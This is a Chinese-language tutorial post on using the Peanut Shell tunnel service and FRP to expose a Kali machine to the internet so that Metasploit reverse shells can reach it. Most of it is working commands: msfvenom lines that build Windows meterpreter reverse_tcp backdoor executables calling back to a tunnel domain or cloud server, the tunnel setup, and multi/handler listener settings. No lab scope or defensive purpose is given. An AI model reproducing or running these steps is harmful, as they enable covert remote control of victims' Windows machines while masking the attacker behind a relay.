1. 程式人生 > 其它 >花生殼內網穿透&FRP

花生殼內網穿透&FRP

花生殼內網穿透

大致流程為:花生殼網站註冊--->繫結本地內網主機--->配置對映外網的地址監聽與本地主機對映的埠--->反彈shell

1.在花生殼上配置好地址

https://hsk.oray.com/

2.下載客戶端,用的kali所以選擇Linux下載,注意kali是基於Debian的。

https://hsk.oray.com/download

 3.本地kali執行該命令,並解壓。

┌──(rootkali)-[/opt]

└─# wget "https://down.oray.com/hsk/linux/phddns_5.2.0_amd64.deb" -O phddns_5.2.0_amd64.deb

┌──(rootkali)-[/opt]

└─# dpkg -i phddns_5.2.0_amd64.deb  

4.繫結SN即上面生成的SN號。

方法一:登入花生殼繫結SN並激活。

方法二:訪問http://b.oray.com 使用SN登入然後再繫結花生殼賬號,我這裡SN登入後繫結一直失敗所以使用第一種。

其實都一樣都需要花生殼和在kali生成的SN號繫結。

5.本地kali啟動花生殼

┌──(rootkali)-[/opt]

└─# phddns start

6.生成msf後門檔案

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=361gu87858.yicp.fun LPORT=27126 -b "\x00" -f exe -o houmen1.exe

7.msf開啟監聽模式

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set lhost 192.168.88.89

msf6 exploit(multi/handler) > set lport 4444

msf6 exploit(multi/handler) > run

8.執行生成的該後門檔案即可在本地kali收到反彈的shell

FRP內網穿透

前提需要一臺雲伺服器,優點是方便,隱私。

1.下載frp。

https://github.com/fatedier/frp/releases

2.上傳該包到雲伺服器以及本地kali。

3.在雲伺服器以及本地kali解壓下載的檔案。

tar -zxvf frp_0.45.0_linux_amd64.tar.gz

4、進入解壓目錄分別更改frpc.ini(客戶端,即本地kali)以及frps.ini(服務端,即雲伺服器)。

vim frps.ini     #這是雲伺服器上的

#注意有的雲伺服器埠需要在購買雲伺服器控制檯開通埠。

vim frpc.ini  #這是本地kali的

5、先啟動雲服務端: ./frps -c frps.ini

再啟動客戶端:# ./frpc -c frpc.ini

6、生成msf後門檔案

msfvenom -p windows/meterpreter/reverse_tcp lhost=雲伺服器地址 lport=9999 -f exe -o frp.exe

7msf啟動監聽

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set lhost 127.0.0.1

msf6 exploit(multi/handler) > set lport 4444   #注意要和客戶端frpc.inilocal_port一致

8、執行後門檔案即可反彈